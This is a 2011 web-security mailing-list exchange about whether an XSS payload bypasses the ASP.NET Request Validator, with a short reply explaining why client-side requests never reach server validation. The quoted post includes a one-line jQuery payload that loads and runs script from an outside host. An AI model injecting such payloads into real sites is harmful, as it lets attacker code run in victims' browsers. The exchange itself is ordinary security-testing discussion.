<html>
<head>
<style><!--
.hmmessage P
{
margin:0px;
padding:0px
}
body.hmmessage
{
font-size: 10pt;
font-family:Tahoma
}
--></style>
</head>
<body class='hmmessage'>
If this jQuery .getScript request is only performed client-side, then it wouldn't even be sent to the server-side ASP.NET XSS validation to be bypassed.<br><br><hr id="stopSpelling">Date: Sat, 19 Feb 2011 15:39:06 +0000<br>From: ryandewhurst@gmail.com<br>To: websecurity@webappsec.org<br>Subject: [WEB SECURITY] ASP.NET Request Validator Bypass?<br><br><span class="ecxstatus-body"><span class="ecxstatus-content"><span class="ecxentry-content">Hi,<br><br>Recently on a client test I was able to bypass the <a href="http://ASP.NET" target="_blank">ASP.NET</a> Request Validator by leveraging the jQuery library which was included in the page. I am mainly a LAMP guy and my knowledge of <a href="http://ASP.NET" target="_blank">ASP.NET</a> and how to set it up is minimal. <br>
<br>I was wondering if any one could confirm whether my bypass affects all <a href="http://ASP.NET" target="_blank">ASP.NET</a> installations or whether or not this particular client had it configured incorrectly.  <br><br>I used the following jQuery function to bypass the filter:<br>
</span></span></span><span class="ecxstatus-body"><span class="ecxstatus-content"><span class="ecxentry-content">$.getScript('//<a href="http://ha.ckers.org/.j%27" target="_blank">ha.ckers.org/.j'</a>);</span></span></span><br><span class="ecxstatus-body"><span class="ecxstatus-content"><span class="ecxentry-content"><br>
Thanks,<br>Ryan<br><br clear="all"></span></span></span>Ryan Dewhurst<br><br>blog <a href="http://www.ethicalhack3r.co.uk" target="_blank">www.ethicalhack3r.co.uk</a><br>projects <a href="http://www.dvwa.co.uk" target="_blank">www.dvwa.co.uk</a> | <a href="http://www.webwordcount.com" target="_blank">www.webwordcount.com</a><br>
twitter <a href="http://www.twitter.com/ethicalhack3r" target="_blank">www.twitter.com/ethicalhack3r</a><br>
<br>_______________________________________________
The Web Security Mailing List

WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss

Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA

WASC on Twitter
http://twitter.com/wascupdates

websecurity@lists.webappsec.org
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org                                       </body>
</html>